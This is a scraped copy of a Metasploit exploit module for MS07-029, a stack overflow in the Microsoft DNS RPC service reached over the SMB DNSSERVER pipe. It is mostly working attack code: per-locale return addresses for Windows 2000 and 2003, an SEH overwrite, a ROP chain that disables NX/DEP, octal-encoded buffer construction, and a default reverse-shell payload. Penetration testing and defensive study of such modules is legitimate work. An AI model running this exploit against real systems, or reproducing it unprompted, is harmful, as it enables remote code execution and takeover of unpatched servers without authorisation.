CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::Remote::DCERPC9include Msf::Exploit::Remote::SMB::Client1011def initialize(info = {})12super(update_info(info,13'Name' => 'MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)',14'Description' => %q{15This module exploits a stack buffer overflow in the RPC interface16of the Microsoft DNS service. The vulnerability is triggered17when a long zone name parameter is supplied that contains18escaped octal strings. This module is capable of bypassing NX/DEP19protection on Windows 2003 SP1/SP2. This module exploits the20RPC service using the \\DNSSERVER pipe available via SMB. This21pipe requires a valid user account to access, so the SMBUSER22and SMBPASS options must be specified.23},24'Author' =>25[26'hdm', # initial module27'Unknown', # 2 unknown contributors (2003 support)28'bcoles' # additional target offsets29],30'License' => MSF_LICENSE,31'References' =>32[33['CVE', '2007-1748'],34['OSVDB', '34100'],35['MSB', 'MS07-029']36],37'Privileged' => true,38'DefaultOptions' =>39{40'EXITFUNC' => 'thread',41'PAYLOAD' => 'windows/shell/reverse_tcp'42},43'Payload' =>44{45'Space' => 500,4647# The payload doesn't matter, but make_nops() uses these too48'BadChars' => "\x00",4950'StackAdjustment' => -3500,5152},53'Platform' => 'win',54'Targets' =>55[56[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],5758# p/p/r WS2HELP.DLL59[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],60[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],61[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],62[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],63[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],64[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],65[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],66[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],67[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],68[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],69[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],70[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],71[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],7273# Use the __except_handler3 method (and jmp esp in ATL.dll)74[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],75[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],7677# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)78[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],79[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],80[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],81[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],82[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],83[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],84[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],85],86'DisclosureDate' => '2007-04-12',87'DefaultTarget' => 0 ))8889register_options(90[91OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English'])92])9394deregister_options('SMB::ProtocolVersion')95end969798def gettarget(os)99100targets.each do |target|101if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))102return target103end104end105106return nil107end108109110def exploit111112connect(versions: [1])113smb_login()114115if target.name =~ /Automatic/116117case smb_peer_os()118when 'Windows NT 4.0'119print_status("Detected a Windows NT 4.0 system...")120target = nil121122when 'Windows 5.0'123print_status("Detected a Windows 2000 SP0-SP4 target...")124target = gettarget('2000')125126when 'Windows 5.1'127print_status("Detected a Windows XP system...")128target = nil129130when /Windows Server 2003 (\d+)$/131print_status("Detected a Windows 2003 SP0 target...")132target = gettarget('2003SP0')133134when /Windows Server 2003 (\d+) Service Pack (\d+)/135print_status("Detected a Windows 2003 SP#{$2} target...")136target = gettarget('2003SP12')137else138fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")139end140end141142if (not target)143fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")144end145146print_status("Trying target #{target.name}...")147148# Bind to the service149handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver'])150print_status("Binding to #{handle} ...")151dcerpc_bind(handle)152print_status("Bound to #{handle} ...")153154# Create our buffer with our shellcode first155txt = Rex::Text.rand_text_alphanumeric(8192)156157if (target['OS'] =~ /2000/)158txt[0, payload.encoded.length] = payload.encoded159160off = target['Off']161txt[ off ] = [target.ret].pack('V')162txt[ off - 4, 2] = "\xeb\x06"163txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')164165elsif (target['OS'] =~ /2003SP0/)166txt[0, payload.encoded.length] = payload.encoded167168off = target['Off']169txt[ off ] = [target['Rets'][0]].pack('V') # __except_handler3170txt[ off - 4, 2] = "\xeb\x16"171172# addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9)173addr = target['Rets'][1] - 4174addr1 = addr / 2175addr2 = addr1 + addr % 2176addr1 = addr1 + (addr2 % 12)177addr2 = addr2 / 12178179txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B180181#182# then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here :183#184# 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0185# 0x77f443d0 mov eax, [ebp+arg_0]186# 0x77f443d3 pop esi187# 0x77f443d4 pop edi188# 0x77f443d5 leave ; mov esp, ebp189# 0x77f443d6 retn ; ret190191txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp192txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')193194elsif (target['OS'] =~ /2003SP12/)195off = target['Off']196ib = target['IB']197txt[ off ] = [ib + 0x2566].pack('V')198199200# to bypass NX we need to emulate the call to ZwSetInformationProcess201# with generic value (to work on SP1-SP2 + patches)202203off = 445204205# first we set esi to 0xed by getting the value on the stack206#207# 0x76a81da7:208# pop esi <- esi = edh209# retn210211txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V')212txt[ off + 28, 4] = [0xed].pack('V')213214# now we set ecx to 0x7ffe0300, eax to 0xed215# 0x76a81da4:216# pop ecx <- ecx = 0x7ffe0300217# mov eax, esi <- eax == edh218# pop esi219# retn220221txt[ off + 32, 4] = [ib + 0x1da4].pack('V')222txt[ off + 36, 4] = [0x7ffe0300].pack('V')223224# finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4)225# 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX226# 0x76a8109c:227# call dword ptr [ecx]228229txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx]230txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV')231232# we catch the second exception to go back to our shellcode, now that233# NX is disabled234235off = 1013236txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll)237txt[ off + 24, payload.encoded.length ] = payload.encoded238239end240241req = ''242243# Convert the string to escaped octal244txt.unpack('C*').each do |c|245req << "\\"246req << c.to_s(8)247end248249# Build the RPC stub data250stubdata =251NDR.long(rand(0xffffffff)) +252NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +253254NDR.long(rand(0xffffffff)) +255NDR.string(req + "\x00") +256257NDR.long(rand(0xffffffff)) +258NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")259260print_status('Sending exploit...')261262begin263response = dcerpc.call(1, stubdata)264265if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)266print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])267end268rescue ::Exception => e269print_error("Error: #{e}")270end271272handler273disconnect274end275end276277278